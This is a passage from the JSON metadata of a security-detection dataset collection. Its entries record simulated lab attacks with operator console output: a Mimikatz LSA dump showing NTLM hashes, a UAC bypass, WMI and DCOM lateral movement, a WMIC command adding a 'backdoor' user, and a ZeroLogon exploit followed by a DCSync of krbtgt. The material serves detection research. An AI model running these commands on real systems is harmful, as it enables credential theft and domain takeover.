["Administrator"], "adversary_view": "(wardog) > SharpWMI /command:\"action=exec computername=WORKSTATION6 command=\\\"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\\\"\"\n\n[*] Host : WORKSTATION6\n\n[*] Command : \"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\"\n\n[*] Creation of process returned : 0\n\n[*] Process ID : 3824"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200806115603": {"title": "Covenant PowerShell Remoting Command", "id": "SDWIN-200806115603", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PowerShell Remoting"], "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).", "attack_mappings": [{"technique": "T1021", "sub-technique": "006", "tactics": ["TA0002", "TA0008"]}], 
"notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_psremoting_command.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_psremoting_command.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "PowerShellRemotingCommand", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.LateralMovement.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "[08/06/2020 15:56:13 UTC] PowerShellRemotingCommand completed\n\n(wardog) > PowerShellRemotingCommand /computername:\"WORKSTATION6\" /command:\"get-process\" /domain:\"theshire.local\" /username:\"pgustavo\" /password:\"W1n1!2019\"\n\nHandles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName PSComputerName \n\n------- ------ ----- ----- ------ -- -- ----------- -------------- \n\n 259 17 4712 24656 0.58 7996 2 ApplicationFrameHost WORKSTATION6 \n\n 118 7 6396 10664 0.03 1356 0 conhost WORKSTATION6 \n\n 612 22 1720 4900 0.69 524 0 csrss WORKSTATION6 \n\n 168 11 1544 4164 0.06 604 1 csrss WORKSTATION6 \n\n 401 14 1664 5168 6.94 2528 2 csrss WORKSTATION6 \n\n 384 15 3648 13620 5.97 2888 2 ctfmon WORKSTATION6 \n\n 135 8 2016 12064 0.19 4952 2 dllhost WORKSTATION6 \n\n 235 22 5100 14172 0.33 5028 2 dllhost WORKSTATION6 \n\n 242 16 3776 12940 0.33 7864 2 dllhost WORKSTATION6 \n\n 665 24 17888 38728 0.27 588 1 dwm WORKSTATION6 \n\n 721 32 31996 69820 19.36 2512 2 dwm WORKSTATION6 \n\n 1961 75 43016 122660 26.72 4156 2 explorer WORKSTATION6 \n\n 32 5 1188 2072 0.03 880 1 fontdrvhost WORKSTATION6 \n\n 32 5 1260 2172 0.08 884 0 fontdrvhost WORKSTATION6 \n\n 32 7 3092 5864 0.75 4084 2 fontdrvhost WORKSTATION6 \n\n 0 0 60 8 0 0 Idle WORKSTATION6 \n\n 632 34 17136 49032 0.48 608 1 LogonUI WORKSTATION6"}, 
"references": null}, "SDWIN-200806130039": {"title": "Covenant GetDomainGroup Domain Admins", "id": "SDWIN-200806130039", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Groups Enumeration", "LDAP SearchRequest"], "description": "This dataset represents a threat actor enumerating the domain groups via LDAP (i.e. SearchRequest Method) in an environment.", "attack_mappings": [{"technique": "T1069", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "GetDomainGroup", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSploit.Enumeration.yaml"}], "permissions_required": ["User"], "adversary_view": "[09/22/2020 18:10:15 UTC] GetDomainGroup completed\n(wardog) > GetDomainGroup /identities:\"Domain Admins\"\nsamaccountname: Domain Admins\nsamaccounttype: GROUP_OBJECT\ndistinguishedname: CN=Domain Admins,CN=Users,DC=theshire,DC=local\ncn: Domain Admins\nobjectsid: S-1-5-21-4228717743-1032521047-1810997296-512\ngrouptype: 0\nadmincount: 1\nname: Domain Admins\ndescription: Designated administrators of the domain\nmemberof: CN=Denied RODC Password Replication Group,CN=Users,DC=theshire,DC=local, CN=Administrators,CN=Builtin,DC=theshire,DC=local\nuseraccountcontrol: 0\nbadpasswordtime: 1/1/0001 12:00:00 AM\npwdlastset: 1/1/0001 12:00:00 AM\nwhencreated: 9/17/2020 3:14:46 
PM\nwhenchanged: 9/17/2020 3:29:58 PM\naccountexpires: 1/1/0001 12:00:00 AM\nlastlogon: 1/1/0001 12:00:00 AM\nlastlogoff: 1/1/0001 12:00:00 AM\nobjectcategory: CN=Group,CN=Schema,CN=Configuration,DC=theshire,DC=local\nusnchanged: 12909\ninstancetype: 4\nobjectclass: top, group\niscriticalsystemobject: True\nusncreated: 12345\ndscorepropagationdata: 9/17/2020 3:29:58 PM, 9/17/2020 3:14:47 PM, 1/1/1601 12:04:16 AM\nadspath: LDAP://CN=Domain Admins,CN=Users,DC=theshire,DC=local\nobjectguid: bba6ff30-abfc-4166-b209-5e6edd49366b\nlastlogontimestamp: 1/1/0001 12:00:00 AM"}, "references": null}, "SDWIN-200807103913": {"title": "Empire Mimikatz Lsadump LSA Patch", "id": "SDWIN-200807103913", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["LSASS Memory Credentials Read"], "description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. 
One popular tool performing this behavior is Mimikatz.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "LSASS Access from Non System Account", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lsadump", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*\n(Empire: powershell/credentials/mimikatz/lsadump) > info\n\n Name: Invoke-Mimikatz LSA Dump\n Module: powershell/credentials/mimikatz/lsadump\n NeedsAdmin: True\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @JosephBialek\n @gentilkiwi\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to extract a\n particular user hash from memory. Useful on domain\n controllers.\n\nComments:\n http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n a\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True B7Y8G4XC Agent to run module on. \n Username False Username to extract the hash for, blank \n for all local passwords. 
\n\n(Empire: powershell/credentials/mimikatz/lsadump) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 2\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump\n(Empire: powershell/credentials/mimikatz/lsadump) > \nJob started: VGHXZ5\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n .#####. mimikatz 2.2.0 (x64) #19041 Aug 4 2020 20:16:54\n.## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::lsa /patch\nDomain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380\n\nRID : 000001f7 (503)\nUser : DefaultAccount\nLM : \nNTLM : \n\nRID : 000001f5 (501)\nUser : Guest\nLM : \nNTLM : \n\nRID : 000001f4 (500)\nUser : wardog\nLM : \nNTLM : 42ddb2963bbe8f1c075fc869d3bce33e\n\nRID : 000001f8 (504)\nUser : WDAGUtilityAccount\nLM : \nNTLM : 45a313f1860be24e967e55b94649aa31\n\n(Empire: powershell/credentials/mimikatz/lsadump) >"}, "references": ["https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html"]}, "SDWIN-200904032946": {"title": "Invoke BypassUAC FodHelper", "id": "SDWIN-200904032946", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/04", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["BypassUAC", "Registry Modification", "Windows Registry FodHelper"], "description": "This dataset represents adversaries elevating privileges (bypassing uac) by performing an registry modification for FodHelper.", "attack_mappings": [{"technique": "T1548", "sub-technique": "002", "tactics": ["TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/empire_uac_shellapi_fodhelper.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "bypassuac_fodhelper", "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/Invoke-FodHelperBypass.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: SP7B3U2X) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nKU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5376 5/0.0 2020-09-04 07:07:17 http \nSP7B3U2X ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 1376 5/0.0 2020-09-04 07:12:15 http \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > \n(Empire: SP7B3U2X) > usemodule privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > info\n\n Name: Invoke-FodHelperBypass\n Module: powershell/privesc/bypassuac_fodhelper\n NeedsAdmin: False\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n Petr Medonos\n\nDescription:\n Bypasses UAC by performing an registry modification for\n FodHelper (based\n onhttps://winscripting.blog/2017/05/12/first-entry-welcome-\n and-uac-bypass/)\n\nComments:\n https://winscripting.blog/2017/05/12/first-entry-welcome-\n and-uac-bypass/\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True SP7B3U2X Agent to run module on. \n Listener True Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. 
\n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http\n(Empire: powershell/privesc/bypassuac_fodhelper) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked SP7B3U2X to run TASK_CMD_JOB\n[*] Agent SP7B3U2X tasked with task ID 2\n[*] Tasked agent SP7B3U2X to run module powershell/privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > \nJob started: EHNK23\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent F2X6GE4R checked in\n[+] Initial agent F2X6GE4R from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to F2X6GE4R at 172.18.39.5\n\n(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nKU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5376 5/0.0 2020-09-04 07:07:17 http \nSP7B3U2X ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 1376 5/0.0 2020-09-04 07:30:33 http \nF2X6GE4R ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 3936 5/0.0 2020-09-04 07:30:34 http \n\n\n(Empire: agents) > interact F2X6GE4R\n(Empire: F2X6GE4R) > shell whoami\n[*] Tasked F2X6GE4R to run TASK_SHELL\n[*] Agent F2X6GE4R tasked with task ID 1\n(Empire: F2X6GE4R) > \ntheshire\\pgustavo\n..Command execution"}, "references": 
["https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/"]}, "SDWIN-200914080546": {"title": "Empire Remote WMIC Add User", "id": "SDWIN-200914080546", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/14", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod", "User Backdoor"], "description": "This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 6Z78CY25 checked in\n[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5\nagents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nKFL6CMNZ ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7584 5/0.0 2020-09-14 11:33:59 http \nYGBLW8EM ps 172.18.39.5 WORKSTATION5 *THESHIRE\\wardog powershell 8924 5/0.0 2020-09-14 11:40:53 http \nUBCKLYFA ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5412 5/0.0 2020-09-14 11:57:16 http \n\n6Z78CY25 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 9564 5/0.0 2020-09-14 12:02:08 http \n\n(Empire: agents) > interact 
6Z78CY25\n(Empire: 6Z78CY25) > \n(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create \"net user /add backdoor pa$$w0rd1\"\n[*] Tasked 6Z78CY25 to run TASK_SHELL\n[*] Agent 6Z78CY25 tasked with task ID 1\n(Empire: 6Z78CY25) > \nExecuting (Win32_Process)->Create()\n\nMethod execution successful.\n\nOut Parameters:\ninstance of __PARAMETERS\n{\n ProcessId = 7768;\n ReturnValue = 0;\n};\n\n..Command execution completed.\n\n(Empire: 6Z78CY25) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200916232559": {"title": "Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2", "id": "SDWIN-200916232559", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/16", "modification_date": "2020/09/16", "platform": ["Windows"], "type": "atomic", "tags": ["CVE-2020-1472", "Password Update", "Netlogon Insecure AES-CFB8"], "description": "This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. 
This vulnerability was discovered by [@@SecuraBV](https://twitter.com/SecuraBV).", "attack_mappings": [{"technique": "T1210", "sub-technique": null, "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}, {"type": "tool", "name": "mimikatz", "module": "lsadump", "script": "https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L23"}, {"type": "tool", "name": "SharpZeroLogon", "module": "SharpZeroLogon", "script": "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon"}], "permissions_required": ["User"], "adversary_view": "Mimikatz Implementation (NetrServerAuthenticate2)\n=================================================\n\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\\\" exit\"\n\n .#####. mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22\n.## ^ ##. 
\"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\n\nmimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\n\nTarget : MORDORDC.theshire.local\nAccount: MORDORDC$\nType : 6 (Server)\nMode : exploit\n\nTrying to 'authenticate'...\n====================================================\n\nNetrServerAuthenticate2: 0x00000000\nNetrServerPasswordSet2 : 0x00000000\n\n* Authentication: OK -- vulnerable\n* Set password : OK -- may be unstable\n\nmimikatz(commandline) # exit\n\nBye!\n\nDCSync Follow-up (Optional)\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\\\\"\\\\\" /authntlm\\\" exit\""}, "references": ["https://www.secura.com/blog/zero-logon", "https://www.secura.com/pathtoimg.php?id=2055", "https://twitter.com/gentilkiwi/status/1306178689630076929", "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon", "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc#theGroupPolicy"]}, "SDWIN-200917174542": {"title": "DCOM ExecuteExcel4macro", "id": "SDWIN-200917174542", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", "tags": ["DCOM"], "description": "This dataset represents adversaries leveraging the COM Method ExecuteExcel4Macro over DCOM to execute Excel4 macros remotely", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_allowed.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_allowed.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcel4.exe 172.18.39.6"}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/", "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_blocked.zip", ["https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_blocked.zip"]]}, "SDWIN-200918145959": {"title": "DCOM RegisterXLL", "id": "SDWIN-200918145959", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", "tags": ["DCOM"], "description": "This dataset represents adversaries leveraging the COM Method RegisterXLL over DCOM to execute an XLL file remotely. 
The XLL file can exist on the target or externally in an UNC path such as \\\\SERVER\\FILES\\.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_registerxll.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_registerxll.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcelXLL.exe 172.18.39.6 C:\\\\programdata\\calc.xll"}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/"]}, "SDWIN-200921001437": {"title": "Empire Invoke WMI", "id": "SDWIN-200921001437", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/21", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod"], "description": "This dataset represents an adversary remotely executing code via WMI. 
This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/lateral_movement/invoke_wmi.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \n\nAWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 2228 5/0.0 2020-09-21 04:06:27 http \n\n(Empire: agents) > interact AWTK7BX5\n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http\n(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_wmi) > info\n\n Name: Invoke-WMI\n Module: powershell/lateral_movement/invoke_wmi\n NeedsAdmin: False\n OpsecSafe: True\n 
Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @harmj0y\n\nDescription:\n Executes a stager on remote hosts using WMI.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True AWTK7BX5 Agent to run module on. \n CredID False CredID from the store to use. \n ComputerName True WORKSTATION6.theshire.lo Host[s] to execute the stager on, comma \n cal separated. \n Listener False http Listener to use. \n Command False Custom command to run. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserName False [domain\\]username to use to execute \n command. \n Password False Password to use to execute command. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). 
\n\n(Empire: powershell/lateral_movement/invoke_wmi) > execute\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 3\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent EHUNP61R checked in\n[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_wmi) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \n\nAWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 2228 5/0.0 2020-09-21 04:14:58 http \nEHUNP61R ps 172.18.39.6 WORKSTATION6 *THESHIRE\\pgustavo powershell 9804 5/0.0 2020-09-21 04:14:56 http \n\n(Empire: agents) > interact EHUNP61R\n(Empire: EHUNP61R) > shell whoami\n[*] Tasked EHUNP61R to run TASK_SHELL\n[*] Agent EHUNP61R tasked with task ID 1\n(Empire: EHUNP61R) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: EHUNP61R) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200921175806": {"title": "Empire Elevated Scheduled Tasks", "id": "SDWIN-200921175806", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/21", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Local Scheduled Tasks"], "description": "This dataset represents adversaries creating and/or 
executing local scheduled tasks to maintain persistence in an environment.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "schtasks", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["User"], "adversary_view": "Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- \n5LKFT4WY ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7172 5/0.0 2020-09-21 21:28:46 http \nM43EPU58 ps 